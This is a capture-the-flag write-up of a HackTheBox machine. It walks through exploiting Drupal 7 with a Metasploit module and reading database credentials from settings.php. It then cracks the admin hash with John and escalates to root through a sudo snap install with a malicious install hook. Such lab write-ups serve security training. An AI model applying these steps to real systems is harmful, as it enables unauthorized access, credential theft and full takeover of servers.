![7d7d53d0b5f332b4cbafe6bdcd30c2ee.png](b81d625b23ad4bdda6d49bae5229a860.png)
### Port Scanning and General Enumeration (Nmap)
My **allports (-p-)** scan showed 22 and 80 open. Not much.
![b500616c4207aa9cc48e4190ddce65a9.png](c8b2e7e4adac4cf4a51efbe7b9e38c1e.png)
Tons of disallows in **robots.txt**, but nothing super interesting. **Drupal** version number though. Is 7 vulnerable to anything?
---
### Access (searchsploit, metasploit, drupal)
Let's check **searchsploit** for **Drupal 7**
![32204402cf361d87f0db376a0e51aeb7.png](64fe0432ded3489c8e55265dd8bc5c77.png)
Looks like there's a ruby module for metasploit
1. `msfconsole`
2. `search drupal 7`
![a8c54725cf4f15cece3bc602969231b8.png](a28cc04e16084275a82ce29b3f116cdb.png)
3. `use 4`
4. `set lhost tun0`
5. `set rhosts MACHINEIP`
Using 4 we get a shell as 'apache' but it's really bad.
After some googling for locations, I found the **Drupal config file** located at `/var/www/html/sites/default/settings.php`
Database creds in that file!
![7d5d856adb4768adaee4eb2d25085625.png](10024dc310054ba6bef123649755e18b.png)
`mysql -u drupaluser -p`
Can't get output from mysql, but it's working.
1. `use drupal;`
2. `select name, pass from users;`
![a276807aedcd4404caaeabc316688f4d.png](0aebfe31d5134aa286c178d245e300bb.png)
Saved the hash and ran it through John
![975a6d61d816535119c9a3689af43b0c.png](1f431373095e4e5698cfb1d51fd351a5.png)
The cracked hash gave us the password for the **brucetherealadmin** account. SSH in and capture the user flag!
![8820ff079e8aac0f31a68576d74c2b64.png](511c5569be534af5ada9ae4055b575eb.png)
---
### Privesc (sudo, snap, fpm, gtfobins)
`sudo -l`
![4a316a471c7ac89a3ac67b6b6e65e36b.png](82b556430aa54bea8f3559024507f763.png)
gtfobins for snap
https://gtfobins.github.io/gtfobins/snap/
Follow the directions and use **fpm** to generate the file we need, however before you upload it, edit the `/meta/hooks/install` file. Mine just cats the flag, but you can use whatever command you want.
```
#!/bin/sh
cat /root/root.txt; false
```
![a5561409fd52d4bb237fbd8c7a5f4a26.png](5828895e7795493ea86ab12096caa8c5.png)
Root flag!
---
Back to [[HackTheBox Index]]
Tags: #htb #metasploit #johntheripper #hashcracking #snap
Related: